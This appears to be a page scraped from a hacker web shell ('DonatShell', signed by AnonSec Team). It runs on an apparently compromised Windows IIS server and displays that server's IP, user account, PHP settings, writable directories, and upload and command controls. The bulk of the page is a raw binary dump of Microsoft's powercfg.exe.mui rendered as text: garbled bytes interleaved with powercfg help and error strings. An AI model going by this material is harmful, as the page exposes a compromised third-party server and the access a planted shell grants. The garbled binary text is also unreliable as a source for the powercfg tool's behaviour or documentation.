DonatShell
Server IP : 180.180.241.3  /  Your IP : 216.73.216.127
Web Server : Microsoft-IIS/7.5
System : Windows NT NETWORK-NHRC 6.1 build 7601 (Windows Server 2008 R2 Standard Edition Service Pack 1) i586
User : IUSR ( 0)
PHP Version : 5.3.28
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/Windows/System32/en-US/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : C:/Windows/System32/en-US/powercfg.exe.mui
MZ@	!L!This program cannot be run in DOS mode.

$uEEELlDLl
DRichEPELa[J!	M9@.rsrc@@(@H`_x 	8
Ph
(@Xp0H `!x"#$%'() *8+P,h-./01456(7@8X9p:;?@BF	I	L0	MH	N`	Px	Q	R	S	T	X	Y
Z 
[8
\P
]h
^
9
X
Y
_
`
(@Xp0H`	x									
	
	(
	8
	H
	X
	h
	x
	
	
	
	
	
	
	
	
			(	8	H	X	h	x											(	8	H	X	h	x											(	8	H	X	h	x											(	8	H	X	h	x											(	8	H	X	h	x"@#'N8+,$-1bL5H:*t=@*,D LElGIPKHMLOHQTS4U WY]h_HacegiBjtm p<rztuTw@yj{.| ~Ȁ<204fTrȊ܋l܍Ўr$tH@~\vjtp,,.\X\H$lt<8`bt4"XMUIОqddsg=Wy%G_uAMUIen-USONOFF(Hibernation state must be "on" or "off"
$System does not support hibernation
%Unable to configure hibernation file
(Unable to determine system capabilities
(Invalid Parameters -- try "/?" for help
Out of Memory
Scheme Not Found
Active Power Scheme is Invalid
`The scheme could not be imported because a power scheme with the specified GUID already exists.
$Unable to create a new power scheme
A scheme name must be specified when creating a new scheme.
Either specify an existing scheme number or do not use /NUMERICAL.
Name                       %s
Description                %s
PAONon-admin users cannot modify power settings from a Terminal Services session.
*The active power scheme cannot be deleted
bThe scheme could not be duplicated because a power scheme with the specified GUID already exists.
MGroup policy override settings exist for this power scheme or power setting.
AYou do not have the permissions required to perform this action.

 POWERCFG <command line options>

Description:
PAE  This command line tool enables users to control the power settings
  on a system.

PAParameter List:
J  -LIST, -L   Lists all power schemes in the current user's environment.

%              Usage: POWERCFG -LIST

PAD  -QUERY, -Q  Displays the contents of the specified power scheme.

?              Usage: POWERCFG -QUERY <SCHEME_GUID> <SUB_GUID>

O              <SCHEME_GUID>  (optional) Specifies the GUID of the power scheme
O                             to display, can be obtained by using powercfg -l.
K              <SUB_GUID>     (optional) Specifies the GUID of the subgroup
R                             to display.  Requires a SCHEME_GUID to be provided.

L              If neither SCHEME_GUID or SUB_GUID are provided, the settings
G              of the current user s active power scheme are displayed.
PAK              If SUB_GUID is not specified, all settings in the specified 
+              power scheme are displayed.

E  -CHANGE, -X Modifies a setting value in the current power scheme.

4              Usage: POWERCFG -X <SETTING> <VALUE>

B              <SETTING>   Specifies one of the following options:
8                          -monitor-timeout-ac <minutes>
8                          -monitor-timeout-dc <minutes>
PA5                          -disk-timeout-ac <minutes>
5                          -disk-timeout-dc <minutes>
8                          -standby-timeout-ac <minutes>
8                          -standby-timeout-dc <minutes>
:                          -hibernate-timeout-ac <minutes>
;                          -hibernate-timeout-dc <minutes>

              Example:
:                  POWERCFG -Change -monitor-timeout-ac 5

I              This would set the monitor idle timeout value to 5 minutes
!              when on AC power.

G  -CHANGENAME Modifies the name of a power scheme and optionally it's 
              description.

PAO              Usage: POWERCFG -CHANGENAME <GUID> <name> <scheme description> 

L              If the description is omitted only the name will be changed.

  -DUPLICATESCHEME 
E              Duplicates the specified power scheme.  The resulting 
G              GUID which represents the new scheme will be displayed.

J              Usage: POWERCFG -DUPLICATESCHEME <GUID> <destination GUID>

PAR              <GUID>  Specifies a scheme GUID obtained by using the powercfg -l.

C              If <destination GUID> is omitted, a new GUID will be
2              created for the duplicated scheme.

A  -DELETE, -D Deletes the power scheme with the specified GUID.

.              Usage: POWERCFG -DELETE <GUID>

=              <GUID>  obtained by using the LIST parameter.

  -DELETESETTING 
(              Deletes a power setting.

I              Usage: POWERCFG -DELETESETTING <SUB_GUID> <SETTING_GUID> 

;              <SUB_GUID>      Specifies the subgroup GUID.
A              <SETTING_GUID>  Specifies the power setting guid.

  -SETACTIVE, -S 
F              Makes the specified power scheme active on the system.

8              Usage: POWERCFG -SETACTIVE <SCHEME_GUID>

9              <SCHEME_GUID>  Specifies the scheme guid.

PA  -GETACTIVESCHEME 
;              Retrieve the currently active power scheme.

1              Usage: POWERCFG -GETACTIVESCHEME 

  -SETACVALUEINDEX
E              Sets a value associated with a specified power setting
8              while the system is powered by AC power.

H              Usage: POWERCFG -SETACVALUEINDEX <SCHEME_GUID> <SUB_GUID>
N                                               <SETTING_GUID> <SettingIndex>

G              <SCHEME_GUID>   Specifies a power scheme GUID and may be
=                              obtained by using PowerCfg /L.
Q              <SUB_GUID>      Specifies a subgroup of power setting GUID and may
PAB                              be obtained by using "PowerCfg /Q."
Q              <SETTING_GUID>  Specifies an individual power setting GUID and may
B                              be obtained by using "PowerCfg /Q".
PAP              <SettingIndex>  Specifies which of the list of of possible values
B                              this power setting will be set to.

              Example:
C                  POWERCFG -SetAcValueIndex <GUID> <GUID> <GUID> 5
O                  This would set the power setting's AC value to the 5th entry
J                  in the list of possible values for this power setting.

  -SETDCVALUEINDEX 
E              Sets a value associated with a specified power setting
8              while the system is powered by DC power.

H              Usage: POWERCFG -SETDCVALUEINDEX <SCHEME_GUID> <SUB_GUID>
M                                               <SETTING_GUID> <SettingIndex>
G              <SCHEME_GUID>   Specifies a power scheme GUID and may be
=                              obtained by using PowerCfg /L.
Q              <SUB_GUID>      Specifies a subgroup of power setting GUID and may
B                              be obtained by using "PowerCfg /Q."
Q              <SETTING_GUID>  Specifies an individual power setting GUID and may
B                              be obtained by using "PowerCfg /Q".
M              <SettingIndex>  Specifies which of the list of possible values
<                              this setting will be set to.

              Example:
C                  POWERCFG -SetDcValueIndex <GUID> <GUID> <GUID> 5
O                  This would set the power setting's DC value to the 5th entry
PAJ                  in the list of possible values for this power setting.

  -HIBERNATE, -H
P              Enables-Disables the hibernate feature.  Hibernate timeout is not
)              supported on all systems.

*              Usage: POWERCFG -H <ON|OFF>
5                     POWERCFG -H -Size <PercentSize>
PAO              -Size  Specifies the desired hiberfile size in percentage of the
O                     total memory. The default size cannot be smaller than 50.
P                     This switch will also enable the hiberfile automatically.

  -AVAILABLESLEEPSTATES, -A  
?              Reports the sleep states available on the system
L              Attempts to report reasons why sleep states are unavailable.

  -DEVICEQUERY
J              Return a list of devices that meet the specified criteria.

9              Usage: POWERCFG -DEVICEQUERY <queryflags>

E              <queryflags>  Secifies one of the following criteria:

Q              wake_from_S1_supported  Return all devices that support waking the
PAG                                      system from a light sleep state.
Q              wake_from_S2_supported  Return all devices that support waking the
H                                      system from a deeper sleep state.
R              wake_from_S3_supported  Return all devices that support waking the 
K                                      system from the deepest sleep state.
R              wake_from_any           Return all devices that support waking the 
C                                      system from any sleep state.
K              S1_supported            List devices supporting light sleep.
L              S2_supported            List devices supporting deeper sleep.
M              S3_supported            List devices supporting deepest sleep.
K              S4_supported            List devices supporting hibernation.
N              wake_programmable       List devices that are user-configurable
M                                      to wake the system from a sleep state.
Q              wake_armed              List devices that are currently configured
O                                      to wake the system from any sleep state.
P              all_devices             Return all devices present in the system.
F              all_devices_verbose     Return verbose list of devices.
              Example:
4                  POWERCFG -DEVICEQUERY wake_armed

PA  -DEVICEENABLEWAKE
H              Enable the device to wake the system from a sleep state.

>              Usage: POWERCFG -DEVICEENABLEWAKE <devicename>

?              <devicename>  Specifies a device retrieved using
H                            "PowerCfg -DEVICEQUERY wake_programmable".

              Example:
-                  POWERCFG -DEVICEENABLEWAKE
N                                       "Microsoft USB IntelliMouse Explorer"

L  -DEVICEDISABLEWAKE <devicename> disable the device from waking the system
L              Disable the device from waking the system from a sleep state

3              Usage: POWERCFG -DEVICEDISABLEWAKE 

?              <devicename>  Specifies a device retrieved using
A                            "PowerCfg -DEVICEQUERY wake_armed".

C  -IMPORT     Imports all power settings from the specified file.

:              Usage: POWERCFG -IMPORT <filename> <GUID> 

PAP              <filename>  Specify a fully-qualified path to a file generated by
>                          using "PowerCfg -EXPORT parameter".
Q              <GUID>      (optional) The settings are loaded into a power scheme
N                          represented by this GUID. If not supplied, powercfg
PA<                          will generate and use a new GUID

              Example:
PA2                  POWERCFG -IMPORT c:\scheme.pow

O  -EXPORT     Exports power scheme, represented by the specified GUID, to the 
              specified file.

:              Usage: POWERCFG -EXPORT <filename> <GUID> 

P              <filename>  Specify a fully-qualified path to a destination file.
O              <GUID>      specifies a power scheme GUID and may be obtained by
/                          using "PowerCfg /L"

              Example:
PA1                  POWERCFG -EXPORT c:\scheme.pow
I                                   381b4222-f694-41f0-9685-ff5bb260df2e

K  -LASTWAKE   Reports information about what woke the system from the last
               sleep transition

@  -HELP, -?   Displays information on command-line parameters.

PAB  -ALIASES    Displays all aliases and their corresponding GUIDs.
E              The user may use these aliases in place of any GUID on
PA               the commandline.

  -SETSECURITYDESCRIPTOR
E              Sets a security descriptor associated with a specified
7              power setting, power scheme, or action.

K              Usage: POWERCFG -SETSECURITYDESCRIPTOR <GUID|ACTION> <SDDL>

M              <GUID>       Specifies a power scheme or a power setting GUID.
@              <ACTION>     Can be one of the following strings:
H                           ActionSetActive, ActionCreate, ActionDefault
PAP              <SDDL>       Specifies a valid security descriptor string in SDDL
O                           format. Call POWERCFG -GETSECURITYDESCRIPTOR to see
4                           an example SDDL STRING.

  -GETSECURITYDESCRIPTOR
F              Gets a security descriptor associated with a specified 
7              power setting, power scheme, or action.

D              Usage: POWERCFG -GETSECURITYDESCRIPTOR <GUID|ACTION> 
M              <GUID>       Specifies a power scheme or a power setting GUID.
@              <ACTION>     Can be one of the following strings:
I                           ActionSetActive, ActionCreate, ActionDefault

PA#
Existing Power Schemes (* Active)
$-----------------------------------

System Power Scheme
---------------------
An unexpected error condition has occurred.  Unable to perform operation.  You may not have permission to perform this operation.
IThe hibernation timeout must be at least as long as the standby timeout.
PAAfter %lu mins
Never
Not Supported
PA)WARNING: System does not support standby
JWARNING: System may not support waking from standby in order to hibernate
6WARNING: System does not support monitor power saving
PA3WARNING: System does not support disk power saving
GYou do not have permission to enable or disable the Hibernate feature.
Unable to load POWRPROF.DLL
Unable to use POWRPROF.DLL
PAPower Scheme GUID: Subgroup GUID: Power Setting GUID:  Current AC Power Setting Index:  Current DC Power Setting Index: !Settings belonging to no subgroupPAMinimum Possible Setting: Maximum Possible Setting: Possible Settings increment: Possible Settings units:  Possible Setting Friendly Name: Possible Setting Index:  Default AC Setting Value Index:  Default DC Setting Value Index:   @The power scheme, subgroup or setting specified does not exist.
=You do not have permission to enable or disable device wake.
The file could not be found.
[The value specified is mal-formed, or is not within the range of the target power setting.
PA_The power setting has been changed, but could not be applied from a Terminal Services session.
PAoHibernation failed with the following error: %s
The following items are preventing hibernation on this system.
	There are no reported reasons hibernation does not work.  Ensure that you have permission to enable hibernation on this system.
3	The system firmware does not support hibernation.
J	The system firmware supports hibernation, but it does not work properly.
PA,	The platform does not support hibernation.
4	There are one or more legacy drivers installed: %s
1	The storage drivers do not support hibernation.
U	The system could not create the hibernation file.  The specific error code is 0x%x.
?	An internal error occurred.  The specific error code is 0x%x.
Q	Hibernation is not allowed due to the amount of memory installed on the system.
^	The system has more than one processor and hibernate will not work properly because of this.
}	The VGAPNP.SYS driver specifically disallows hibernation.  Check for a more appropriate video driver to enable hibernation.
7	An unknown error occurred while enabling hibernation.
+	The previous attempt to hibernate failed.
8	An internal system component has disabled hibernation.
4	The current power policy has disabled hibernation.
2	The hiberfile size has been set to: %I64u bytes.
PA)	The system doesn't support hibernation.
PA@	There are no reported reasons for the sleep state to not work.
:	The system firmware does not support this standby state.
T	The system firmware may support this standby state, but it does not work properly.
j	The standby state is not supported on this system.  ACPI is not enabled or not supported on this system.
U	There are one or more legacy drivers installed which prevent this standby state: %s
	SHOULD NOT OCCUR.
	SHOULD NOT OCCUR.
	SHOULD NOT OCCUR.
X	This standby state is not allowed due to the amount of memory installed on the system.
g	The system has more than one processor and this standby state will not work properly because of this.
}	The VGAPNP.SYS display driver does not support standby.  Please consult your hardware vendor for an updated display driver.
3	An unknown error occurred while enabling standby.
)	The previous attempt to standby failed.
?	An internal system component has disabled this standby state.
;	The current power policy has disabled this standby state.
0	The system doesn't support this standby state.
Standby (S1)Standby (S2)Standby (S3)<Unable to retrieve the supported sleep states on the system.RUnable to retrieve verbose reasons why sleep states are unavailabe on this system.8The following sleep states are available on this system:<The following sleep states are not available on this system:Standby(S1S2S3)	HibernateShutdownHybrid Sleep#	Hibernation has not been enabled.
PA>WARNING: Battery alarm action changed from HIBERNATE to NONE.
MWARNING: Failed to automatically change battery alarm action from HIBERNATE.
PAWake History Count - %d
Wake History [%d]
  Wake Source Count - %d
  Wake Source [%d]
    Type: Unknown (%d)
    Type: Device
    Type: Wake Timer
    Type: Fixed Feature
PA    Instance Path: %s
    Friendly Name: %s
    Description: %s
    Manufacturer: %s
    Unknown (%d)
    Power Button
    Sleep Button
!    System Woke Up to Doze to S4
    Owner:     Owner Supplied Reason: V    Windows was not able to record information about wake timer due to low resources.
PA*Imported Power Scheme Successfully. GUID: Busy Adjust Threshold: %d
Time Check: %d
Increase Time: %d
Decrease Time: %d
PAIncrease Percent: %d
Decrease Percent: %d
Domain Accounting Policy: %d
Increase Policy: %d
Decrease Policy: %d
PA
Revision: %d
Policy Count: %d
[C%d] Time Check: %d
[C%d] Demote Percent: %d
[C%d] Promote Percent: %d
Scaling Allowed: %d

Disabled: %d
PA	DISPLAY:
SYSTEM:

AWAYMODE:
Legacy Kernel CallerNone.
PAkThe ENERGY command requires administrator privileges and must be executed from an elevated command prompt.
Could not open the NT Kernel Logger.  The NT Kernel Logger is already in use.  Ensure that all other performance monitoring utilities, including Reliability and Performance Monitor are not currently in use.
Could not open the Power Efficiency Diagnostic ETW session.  The ETW session is already in use.  Ensure that no other instances of PowerCfg are currently running.
#Enabling tracing for %d seconds...
Observing system behavior...
Analyzing trace data...
Analysis complete.
Trace complete.
,
No energy efficiency problems were found.

)
Energy efficiency problems were found.


%d Errors
%d Warnings
%d Informational
<The directory specified to store trace data does not exist.
JThe Power Efficiency Diagnostic library (energy.dll) could not be loaded.

See %s for more details.
%Timer set by %s expires at %s on %s.

  Reason: /There are no active wake timers in the system.
ERROR:WARNING:SUCCESS:INFO:N/AType the password for %s:2Passing the user credential for local connection.
7The target system must be running Windows XP or above.
9The remote system must be running Windows 2000 or above.
PA>Invalid syntax. '%s' value is not allowed for '%s' option.
%s
9Invalid syntax. Specify valid numeric value for '%s'.
%s
AInvalid syntax. Specifiy valid floating point value for '%s'.
%s
5Invalid syntax. Mandatory option '%s' is missing.
%s
FInvalid syntax. '%s' option is not allowed more than '%d' time(s).
%s
#Invalid argument/option - '%s'.
%s
0Invalid syntax. Default argument is missing.
%s
FLength of the command line argument should not exceed 255 characters.
IInvalid syntax. Default option is not allowed more than '%d' time(s).
%s
,Invalid syntax. Value expected for '%s'.
%s
BInvalid syntax. '%s' value is not allowed as default argument.
%s
Type "%s /?" for usage.*Value for '%s' option cannot be empty.
%s
-Value for default option cannot be empty.
%s
PA<Invalid syntax. Specify valid numeric value for default.
%s
DInvalid syntax. Specifiy valid floating point value for default.
%s
>Value for default option cannot be more than %d character(s).
?Invalid syntax. Value cannot be specified with '%s' option.
%s
;Value for '%s' option cannot be more than %d character(s).
  -REQUESTS
F              Enumerate application and driver Power Requests. Power 
M              Requests prevent the computer from automatically powering off 
@              the display or entering a low-power sleep mode. 

PA  -REQUESTSOVERRIDE
O              Sets a Power Request override for a particular Process, Service,
O              or Driver. If no parameters are specified, this command displays
=              the current list of Power Request Overrides. 

P              Usage: POWERCFG -REQUESTSOVERRIDE <CALLER_TYPE> <NAME> <REQUEST> 
K              <CALLER_TYPE>    Specifies one of the following caller type:
N                               PROCESS, SERVICE, DRIVER. This is obtained by 
H                               calling the POWERCFG -REQUESTS command. 
L              <NAME>           Specifies the caller name. This is the name 
Q                               returned from calling POWERCFG -REQUESTS command.
L              <REQUEST>        Specifies one or more of the following Power
I                               Request Types: Display, System, Awaymode.
              Example:
R                  POWERCFG -REQUESTSOVERRIDE PROCESS wmplayer.exe Display System


  -ENERGY
O              Analyze the system for common energy-efficiency and battery life
O              problems. The ENERGY command should be used when the computer is
N              idle and with no open programs or documents. The ENERGY command
P              will generate an HTML report file in the current path. The ENERGY
PAC              command supports the following optional parameters:

B              Usage: POWERCFG -ENERGY [-OUTPUT <FILENAME>] [-XML]
<                                      [-DURATION <SECONDS>]
PA=                     POWERCFG -ENERGY -TRACE [-D <FILEPATH>]
C                                             [-DURATION <SECONDS>]
P              -OUTPUT <FILENAME>     Specify the path and filename to store the
>                                     energy report HTML file.
D              -XML                 - Format the report file as XML.
O              -TRACE               - Record system behavior and do not perform
PAP                                     analysis. Trace files will be generated in
N                                     the current path unless the -D parameter
3                                     is specified.
P              -D <FILEPATH>        - Specify the directory to store trace data.
PAQ                                     May only be used with the -TRACE parameter.
N              -DURATION <SECONDS>    Specify the number of seconds to observe
N                                     system behavior.  Default is 60 seconds.
PA  -WAKETIMERS
P              Enumerate the active wake timers. If enabled, the expiration of a
L              wake timer wakes the system from sleep and hibernate states.


PA4VS_VERSION_INFO@@?StringFileInfo040904B0LCompanyNameMicrosoft Corporationj!FileDescriptionPower Settings Command-Line Tooll&FileVersion6.1.7600.16385 (win7_rtm.090713-1255):
InternalNamePowerCfg.exe.LegalCopyright Microsoft Corporation. All rights reserved.JOriginalFilenamePowerCfg.exe.muij%ProductNameMicrosoft Windows Operating SystemBProductVersion6.1.7600.16385DVarFileInfo$Translation	PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING

Anon7 - 2022
AnonSec Team